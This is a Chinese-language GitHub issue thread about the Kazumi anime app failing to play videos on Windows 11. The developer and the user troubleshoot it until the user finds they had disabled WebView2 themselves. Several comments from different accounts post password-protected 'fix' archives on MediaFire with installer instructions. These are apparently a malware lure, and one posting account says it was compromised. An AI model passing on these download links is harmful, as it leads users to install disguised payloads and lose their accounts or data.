### ISSUE TITLE
[Bug]: Windows平台特定情况下webview2冻结

### ISSUE THREAD

**Issue by Cheng-MaoMao** [Predidit/Kazumi#175]
### 在使用的时候发生了什么 Bug ？

# 所有播放源都试过无法播放，显示网络异常
![无标题](https://github.com/user-attachments/assets/ad8ea720-9261-4360-9735-c2c13dc15040)
![无标题](https://github.com/user-attachments/assets/b53a72fb-f7ad-4888-83e2-b6196efd343c)
# 但番剧信息可以加载正常
![无标题](https://github.com/user-attachments/assets/3a13b3ba-b590-4c34-922d-5a12403c44f1)
![无标题](https://github.com/user-attachments/assets/6e441026-b17b-4bc8-b8c3-0e5fdb22b44b)

### 您在使用哪个操作系统？

Windows

### 请具体提供设备、版本号等信息。

版本	Windows 11 专业版
版本号	23H2
安装日期	‎2024/‎8/‎14
操作系统版本	22631.4037
体验	Windows Feature Experience Pack 1000.22700.1027.0

### 日志信息

```shell
**2024-08-26 16:50:41.609119** 
 webDav backup diretory create failed 
 null**2024-08-26 16:50:41.652340** 
 同步观看记录失败 DioException [bad response]: null
Error: Service Unavailable 
 null**2024-08-26 16:52:49.471040** 
 webDav backup diretory create failed 
 null**2024-08-26 16:52:49.523019** 
 同步观看记录失败 DioException [bad response]: null
Error: Service Unavailable 
 null
```

### 提交前确认

- [X] issue 列表中，没有我发现的这个 Bug
- [X] 我正在使用最新版本的 Kazumi

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Predidit** [comment]
看上去这是一个网络问题，您可能在少数网络管制非常非常严格，启用了域名白名单的区域。

Kazumi 的番剧信息来自 Bangumi 开放API ，这一服务似乎在白名单内，但各种视频源显然不是。

解决办法只能是使用全局代理。

**Comment by Cheng-MaoMao** [comment]
> 看上去这是一个网络问题，您可能在少数网络管制非常非常严格，启用了域名白名单的区域。
> 
> Kazumi 的番剧信息来自 Bangumi 开放API ，这一服务似乎在白名单内，但各种视频源显然不是。
> 
> 解决办法只能是使用全局代理。

在相同的网络环境下安卓端播放正常
![Screenshot_20240826-170710_Kazumi](https://github.com/user-attachments/assets/6931ca64-2ec4-4289-9e27-24411e6e0a13)

我也尝试过进行全局代理，但依旧无法播放。
![1724663304036](https://github.com/user-attachments/assets/c6fbe163-ee38-4842-af74-73d373d827ee)

**Comment by Cheng-MaoMao** [comment]
> 常用的代理软件，包括你截图里的这个，默认实现都是系统代理(也就是基本上只代理浏览器)
> 
> 这些软件在 Android 上的实现是真正的全局代理
> 
> Kazumi 不是网页，所以没有通过代理连接
> 
> 如果你的安卓端也需要打开代理才能访问的话，那就说明是网络问题，想办法使用 windows 上的真正的全局代理，而不是系统代理
> 
> 如果你的安卓端不开代理也能访问的话，确认系统是否是精简版，精简版可能缺少一些依赖，但是我并没有为这种情况准备错误提示，以及尽量不要解压 Kazumi 到 C 盘，否则可能因为文件系统权限导致一些未预期的问题

我用的Tun模式的代理走虚拟网卡。手机上我没开代理就大陆地区的网络环境也能正常播放。

**Comment by Predidit** [comment]
kazumi 需要后台拉起一个无头 webview 来解析视频流，解析之后会销毁 webview

这一行为依赖 Windows10 及以上版本的 webview2 组件，一些优化脚本或精简版系统可能会移除这一组件

然后就是上面提到的放在 C 盘特定目录导致的文件系统权限问题

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Predidit** [comment]
我很确定这是一个 webview2 调用相关的问题。

设置选项卡里的错误日志有内容吗，使用 webview 插件(例如 ciyuancheng)而非 native 插件可以播放吗。

我在开发时曾经遇到过一次类似的问题，webview2组件基于未知的原因无法被调用，我当时使用重启的办法解决了这一问题，你尝试过重启吗。

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Cheng-MaoMao** [comment]
> 我很确定这是一个 webview2 调用相关的问题。
> 
> 设置选项卡里的错误日志有内容吗，使用 webview 插件(例如 ciyuancheng)而非 native 插件可以播放吗。
> 
> 我在开发时曾经遇到过一次类似的问题，webview2组件基于未知的原因无法被调用，我当时使用重启的办法解决了这一问题，你尝试过重启吗。

# 全体目光向我看齐，我是个🦈💪！！

我说写个程序把webview调出来看一下有没有问题，结果一看报错发现我自己把edge和webview给关了。

![无标题](https://github.com/user-attachments/assets/03596413-fd08-4e34-b06e-329f55ce08da)

重新把webview打开就正常了。
![无标题](https://github.com/user-attachments/assets/12d728e3-9950-4700-a8b8-b2338ea27497)

**Comment by nxllxvxxd** [comment]
# 不要下载我作为评论发布的任何内容，我的账户已被入侵，并被用来入侵他人的账户。

**我正在努力删除并在他们使用我的账户发布此内容的所有主题上发布此内容**。

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
